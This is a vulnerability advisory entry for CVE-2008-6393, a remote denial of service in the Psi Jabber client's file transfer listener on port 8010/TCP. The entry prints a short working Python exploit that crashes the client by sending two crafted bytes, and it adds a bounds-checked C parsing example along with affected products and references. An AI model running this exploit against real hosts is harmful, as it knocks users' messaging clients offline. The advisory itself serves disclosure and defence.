Psi-Im Malformed Packet Remote Denial of Service Vulnerability

Vulnerability ID: 1117128    Vulnerability type: Numeric error
Published: 2008-12-23    Updated: 2009-03-16
CVE ID: CVE-2008-6393    CNNVD-ID: CNNVD-200903-052
Platform: Multiple    CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/7555
https://www.securityfocus.com/bid/32987
https://cxsecurity.com/issue/WLB-2009030126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-052
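|Vulnerability details
Psi is a free instant messaging client for the Jabber IM network. The file transfer feature of the Psi client contains a heap overflow vulnerability: a remote attacker who sends a specially crafted packet to the file transfer protocol, which listens on port 8010/TCP by default, can trigger the overflow and cause a denial of service.
|Exploit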
#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 

# milw0rm.com [2008-12-23]
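
The two bytes sent above can be read as an RFC 1928 SOCKS5 method-selection message (version 5, 255 methods claimed, none supplied); that reading is an assumption and is not stated on this page. The following added example, which is not Psi's code and not part of the original entry, shows a bounds-checked parser for that message; all names in it are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Result codes for the hypothetical parser below. */
enum s5_result { S5_OK = 0, S5_NEED_MORE = 1, S5_BAD = -1 };

#define S5_MAX_METHODS 255 /* NMETHODS is a single unsigned octet */

struct s5_greeting {
    uint8_t nmethods;
    uint8_t methods[S5_MAX_METHODS]; /* sized for the largest legal count */
};

/*
 * Parse VER(1) NMETHODS(1) METHODS(NMETHODS) from the bytes received so far.
 * Nothing is copied until the whole message is present, and the length byte
 * is only ever handled as an unsigned value.
 */
enum s5_result s5_parse_greeting(const uint8_t *buf, size_t len,
                                 struct s5_greeting *out, size_t *consumed)
{
    if (len < 2)
        return S5_NEED_MORE;      /* header not complete yet */
    if (buf[0] != 0x05)
        return S5_BAD;            /* not SOCKS version 5 */

    size_t n = buf[1];            /* 0xff is 255 here, never -1 */
    if (n == 0)
        return S5_BAD;            /* at least one method is required */
    if (len - 2 < n)
        return S5_NEED_MORE;      /* claimed count exceeds data received */

    out->nmethods = (uint8_t)n;
    memcpy(out->methods, buf + 2, n); /* n <= 255 == sizeof out->methods */
    *consumed = 2 + n;
    return S5_OK;
}
```

A caller should pair S5_NEED_MORE with a read timeout so that a peer which never sends the promised bytes cannot hold the connection open.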
|Affected products
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
Psi Psi 0.12
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
|References

Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?release_id=658912
Source: BUGTRAQ
Name: 20081223 [ISecAuditors Security Advisories] PSI remote integer overflow DoS
Link: http://www.securityfocus.com/archive/1/499563
Source: MLIST
Name: [oss-security] 20090225 CVE request: Psi < 0.12.1 DoS
Link: http://www.openwall.com/lists/oss-security/2009/02/25/5
Source: MILW0RM
Name: 7555
Link: http://www.milw0rm.com/exploits/7555
Source: DEBIAN
Name: DSA-1741
Link: http://www.debian.org/security/2009/dsa-1741
Source: SECUNIA
Name: 34301
Link: http://secunia.com/advisories/34301
Source: SECUNIA
Name: 34259
Link: http://secunia.com/advisories/34259
Source: SECUNIA
Name: 33311
Link: http://secunia.com/advisories/33311
Source: SUSE
Name: SUSE-SR:2009:006
Link: http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00001.html
Source: MISC
Link: http://jolmos.blogspot.com/2008/12/psi-remote-integer-overflow.html
Source: bugs.gentoo.org
Link: http://bugs.gentoo.org/show_bug.cgi?id=252830